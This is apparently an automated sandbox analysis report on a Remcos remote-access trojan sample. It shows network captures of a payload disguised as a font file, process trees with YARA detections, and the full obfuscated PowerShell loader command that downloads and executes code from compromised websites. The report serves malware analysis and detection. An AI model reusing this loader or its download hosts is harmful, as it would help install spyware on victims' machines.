                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.64972334.166.62.1904432064C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-26 13:47:22 UTC107OUTGET /wp-admin/oserve/transportment.pfm HTTP/1.1
                                                                  Host: new.quranushaiqer.org.sa
                                                                  Connection: Keep-Alive
                                                                  2024-07-26 13:47:23 UTC396INHTTP/1.1 200 OK
                                                                  Server: nginx/1.26.1
                                                                  Date: Fri, 26 Jul 2024 13:47:22 GMT
                                                                  Content-Type: application/x-font-type1
                                                                  Content-Length: 519984
                                                                  Connection: close
                                                                  Last-Modified: Mon, 08 Jul 2024 02:08:54 GMT
                                                                  ETag: "7ef30-61cb2e520d854"
                                                                  Accept-Ranges: bytes
                                                                  X-Cache: HIT from Backend
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Content-Type-Options: nosniff
                                                                  2024-07-26 13:47:23 UTC15988INData Raw: 32 63 6e 59 77 75 74 45 2b 59 64 53 59 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 54 70 72 77 41 41 41 4e 6e 2f 68 38 6e 72 58 76 71 6a 4a 6b 32 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 55 66 4a 64 37 6b 6d 39 76 69 36 30 49 6e 4b 34 56
                                                                  Data Ascii: 2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4V
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 58 59 62 66 57 6d 54 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 74 6e 31 32 65 58 72 54 73 55 46 37 30 46 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 51 2b 42 74 41 41 41 41 4e 6a 4b 32 65 44 72 54 36 63
                                                                  Data Ascii: XYbfWmT+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/tn12eXrTsUF70F1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dQ+BtAAAANjK2eDrT6c
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 77 2b 42 71 51 41 41 41 4e 6e 4a 32 65 54 72 55 4e 67 63 31 69 47 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 6d 32 59 50 63 2f 46 57 44 36 37 77 36 30 69 35 36 54 55 35 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55
                                                                  Data Ascii: k5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTkw+BqQAAANnJ2eTrUNgc1iGzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozm2YPc/FWD67w60i56TU5BQUFBQUFBQUFBQU
                                                                  2024-07-26 13:47:23 UTC866INData Raw: 2f 76 37 2b 2f 76 37 2b 2f 67 2b 42 77 77 41 41 41 4a 76 62 34 32 59 50 59 74 33 72 58 71 6c 66 59 48 79 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 75 72 71 36 62 5a 67 39 6b 77 47 59 50 37 4f 66 72 55 61 6e 68 65 69 6f 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49
                                                                  Data Ascii: /v7+/v7+/g+BwwAAAJvb42YPYt3rXqlfYHyurq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6bZg9kwGYP7OfrUanheioyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 39 67 7a 2b 74 4e 2b 4f 6d 58 63 6a 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 39 50 54 30 50 67 5a 77 41 41 41 41 50 61 50 37 5a 37 75 74 4f 37 35 77 53 49 59 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6a 34 2b 50 6d 39 37 68 5a 67 39 6d 78 65 73 2b 74 7a 77 46 51 72 61 32 74 72 61 32 74
                                                                  Data Ascii: 9gz+tN+OmXcj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0PgZwAAAAPaP7Z7utO75wSIY+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pm97hZg9mxes+tzwFQra2tra2t
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 30 61 31 66 6a 75 38 54 77 59 4b 36 6e 4a 36 50 34 54 41 62 4e 38 33 37 54 44 71 53 34 4a 63 54 6e 55 53 55 38 75 57 65 44 6a 39 57 4b 58 32 6b 67 44 4c 30 36 57 62 37 33 52 4a 5a 31 75 72 57 55 48 56 6f 6b 69 6d 4f 55 57 32 33 54 56 2f 6c 39 71 30 43 53 62 50 74 34 4d 56 6c 70 66 51 4b 6f 72 4c 45 47 66 65 77 37 71 79 32 31 64 61 32 31 53 78 77 74 76 72 69 42 67 39 6d 62 2b 51 42 34 58 30 39 6d 6e 78 6b 55 68 38 71 66 4a 71 69 77 41 4c 4e 55 33 6e 69 32 6e 37 62 30 41 48 48 2f 37 55 76 34 57 57 57 38 43 34 61 56 64 55 75 76 39 4a 67 73 37 4b 54 62 49 5a 72 48 4b 4a 6d 30 78 77 73 6d 61 59 52 37 76 63 42 72 49 2f 4d 7a 71 2f 5a 4b 6d 77 49 71 38 74 58 4d 6a 51 74 4c 2f 74 69 77 57 4c 59 73 74 55 33 4d 53 38 63 68 56 6d 76 35 47 6f 2b 2b 4b 4b 4b 56 39 39
                                                                  Data Ascii: 0a1fju8TwYK6nJ6P4TAbN837TDqS4JcTnUSU8uWeDj9WKX2kgDL06Wb73RJZ1urWUHVokimOUW23TV/l9q0CSbPt4MVlpfQKorLEGfew7qy21da21SxwtvriBg9mb+QB4X09mnxkUh8qfJqiwALNU3ni2n7b0AHH/7Uv4WWW8C4aVdUuv9Jgs7KTbIZrHKJm0xwsmaYR7vcBrI/Mzq/ZKmwIq8tXMjQtL/tiwWLYstU3MS8chVmv5Go++KKKV99
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 53 75 2b 38 44 58 65 50 39 51 55 41 53 78 55 6f 77 63 63 54 48 48 76 4c 61 73 49 73 49 7a 43 77 61 35 77 36 52 4d 49 4e 69 33 39 48 59 37 4a 43 51 61 35 49 65 74 38 75 48 32 4d 4b 6e 6a 66 36 31 37 49 69 7a 2f 53 44 67 65 62 4a 31 67 6a 56 50 6f 37 32 38 73 41 49 54 4f 49 78 46 67 6a 54 50 33 6f 4f 4d 6b 34 4e 51 6f 47 76 6f 34 69 73 37 53 6b 41 54 68 53 48 43 39 75 43 78 4a 72 54 4c 73 57 70 54 76 69 42 6f 6b 54 49 51 79 39 65 46 59 76 55 59 4f 42 57 49 63 42 4d 65 6d 4a 53 5a 76 75 6e 32 74 38 6d 43 34 55 76 4c 68 66 79 52 76 68 48 32 74 38 72 66 42 42 6e 4b 50 50 43 77 45 62 72 30 2f 6c 47 43 4a 6b 47 2b 42 37 53 77 45 64 31 72 75 62 47 43 35 65 2b 66 42 71 53 54 30 45 2b 70 56 72 4c 4e 57 51 65 7a 75 70 36 4c 41 33 6e 38 70 49 47 46 39 67 6c 2b 4b 6c
                                                                  Data Ascii: Su+8DXeP9QUASxUowccTHHvLasIsIzCwa5w6RMINi39HY7JCQa5Iet8uH2MKnjf617Iiz/SDgebJ1gjVPo728sAITOIxFgjTP3oOMk4NQoGvo4is7SkAThSHC9uCxJrTLsWpTviBokTIQy9eFYvUYOBWIcBMemJSZvun2t8mC4UvLhfyRvhH2t8rfBBnKPPCwEbr0/lGCJkG+B7SwEd1rubGC5e+fBqST0E+pVrLNWQezup6LA3n8pIGF9gl+Kl
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 73 38 46 66 72 68 75 77 6e 4b 51 76 4c 68 4c 68 54 6f 44 77 77 68 63 78 43 32 57 4e 59 2f 2f 6c 78 49 39 66 70 38 63 79 43 73 49 53 4c 4d 2f 6c 77 6c 78 64 30 63 65 2b 67 56 56 32 7a 70 31 64 31 65 4d 59 36 56 6a 58 45 48 67 4f 79 53 2f 42 75 52 57 4d 43 53 77 47 44 77 39 2b 33 73 62 5a 57 65 6e 4a 38 66 78 73 67 58 4b 64 39 65 4a 73 76 39 4a 6b 32 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 54 67 52 30 42 44 69 6a 75 79 77 76 75 69 31 43 48 79 43 49 44 77 69 72 31 31 76 65 6b 67 6e 68 66 45 66 76 47 44 36 66 2f 31 6c 55 71 2f 79 34 66 5a 2b 70 56 35 49 47 2f 46 31 2f 6c 72 72 73 4a 38 62 63 78 5a 52 53 78 48 44 4c 54 46 37 41 33 36 58 62 39 69 50 30 2f 6f 6b 2b 35 59 4a 51 41 48 44 42 4d 66 56 51 55 2b 4d 47
                                                                  Data Ascii: s8FfrhuwnKQvLhLhToDwwhcxC2WNY//lxI9fp8cyCsISLM/lwlxd0ce+gVV2zp1d1eMY6VjXEHgOyS/BuRWMCSwGDw9+3sbZWenJ8fxsgXKd9eJsv9Jk2t8uF/rfLhf63y4X+t8uF/rfLhf63y4TgR0BDijuywvui1CHyCIDwir11vekgnhfEfvGD6f/1lUq/y4fZ+pV5IG/F1/lrrsJ8bcxZRSxHDLTF7A36Xb9iP0/ok+5YJQAHDBMfVQU+MG
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 6a 53 6a 52 70 78 39 34 59 67 59 55 4e 6f 64 2f 74 6b 50 6b 75 34 6b 4d 57 64 46 50 47 2f 4e 37 6e 56 66 58 31 53 4d 6d 5a 59 4c 4f 35 7a 4b 5a 53 6f 46 4a 73 59 74 61 71 6d 4a 70 34 2b 73 68 2b 4f 6b 4d 48 31 53 41 77 74 68 45 78 67 6a 62 49 34 39 45 6b 73 41 4d 48 71 2f 43 35 67 76 59 4d 41 63 39 54 36 54 66 79 51 41 77 78 67 69 4e 73 57 77 75 30 73 42 56 63 51 4e 79 52 67 69 47 37 45 4d 66 63 73 42 53 78 34 61 73 42 6f 51 43 71 76 76 4b 38 33 36 77 6b 75 77 4c 47 62 43 74 4d 35 53 54 76 75 31 77 36 51 4a 39 49 66 79 76 53 33 2f 6e 6a 4b 72 41 75 4c 4e 2b 4c 58 32 2b 51 50 39 32 50 47 4d 35 65 37 57 47 6a 57 6f 4d 47 34 42 53 44 2f 65 58 53 6c 72 50 4c 68 6c 2f 76 79 35 58 2f 31 44 56 53 48 72 66 4c 68 39 68 43 36 34 33 2b 74 65 79 61 7a 6b 58 33 68 4c
                                                                  Data Ascii: jSjRpx94YgYUNod/tkPku4kMWdFPG/N7nVfX1SMmZYLO5zKZSoFJsYtaqmJp4+sh+OkMH1SAwthExgjbI49EksAMHq/C5gvYMAc9T6TfyQAwxgiNsWwu0sBVcQNyRgiG7EMfcsBSx4asBoQCqvvK836wkuwLGbCtM5STvu1w6QJ9IfyvS3/njKrAuLN+LX2+QP92PGM5e7WGjWoMG4BSD/eXSlrPLhl/vy5X/1DVSHrfLh9hC643+teyazkX3hL
                                                                  2024-07-26 13:47:23 UTC16384INData Raw: 33 79 59 49 41 4e 68 65 73 52 6f 6e 2f 53 68 71 37 79 76 76 34 59 6f 2b 4e 2f 72 59 54 34 4e 6d 69 55 5a 4b 77 73 52 37 42 39 72 66 4a 58 50 32 43 34 5a 59 44 4c 42 53 4a 2f 4f 70 52 6b 70 65 34 4e 62 43 36 76 38 75 45 4b 57 51 36 69 52 32 35 32 46 62 69 75 47 70 47 79 72 4a 52 6b 74 69 6b 68 59 45 78 2b 53 51 66 39 4c 4d 46 39 6f 63 74 67 59 46 51 34 32 47 6d 55 4c 44 46 38 31 41 76 37 59 4a 51 30 57 55 64 32 4b 53 6e 5a 70 57 72 78 34 4d 51 6d 4f 6d 42 4d 6d 79 4b 61 50 79 7a 42 6f 48 70 79 37 64 6d 76 4c 4e 6e 61 76 5a 55 47 4a 76 72 70 38 4f 46 2f 38 77 56 4c 69 43 78 66 70 58 32 74 38 6f 66 6c 61 63 42 67 30 75 6e 77 34 58 2f 31 2b 49 50 46 4c 48 65 6c 66 61 33 79 67 74 4c 57 42 34 66 36 64 62 45 65 38 75 6e 77 34 58 2f 59 42 61 49 76 46 59 38 41 4c
                                                                  Data Ascii: 3yYIANhesRon/Shq7yvv4Yo+N/rYT4NmiUZKwsR7B9rfJXP2C4ZYDLBSJ/OpRkpe4NbC6v8uEKWQ6iR252FbiuGpGyrJRktikhYEx+SQf9LMF9octgYFQ42GmULDF81Av7YJQ0WUd2KSnZpWrx4MQmOmBMmyKaPyzBoHpy7dmvLNnavZUGJvrp8OF/8wVLiCxfpX2t8oflacBg0unw4X/1+IPFLHelfa3ygtLWB4f6dbEe8unw4X/YBaIvFY8AL


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:46:56
                                                                  Start date:26/07/2024
                                                                  Path:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe"
                                                                  Imagebase:0x400000
                                                                  File size:494'592 bytes
                                                                  MD5 hash:3AD8CB387874A15488508BF269FD2520
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:3
                                                                  Start time:09:47:02
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                                                                  Imagebase:0x450000
                                                                  File size:147'456 bytes
                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:09:47:04
                                                                  Start date:26/07/2024
                                                                  Path:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"
                                                                  Imagebase:0x400000
                                                                  File size:494'592 bytes
                                                                  MD5 hash:3AD8CB387874A15488508BF269FD2520
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:09:47:04
                                                                  Start date:26/07/2024
                                                                  Path:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"
                                                                  Imagebase:0x400000
                                                                  File size:494'592 bytes
                                                                  MD5 hash:3AD8CB387874A15488508BF269FD2520
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:09:47:04
                                                                  Start date:26/07/2024
                                                                  Path:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"
                                                                  Imagebase:0x400000
                                                                  File size:494'592 bytes
                                                                  MD5 hash:3AD8CB387874A15488508BF269FD2520
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:09:47:05
                                                                  Start date:26/07/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d 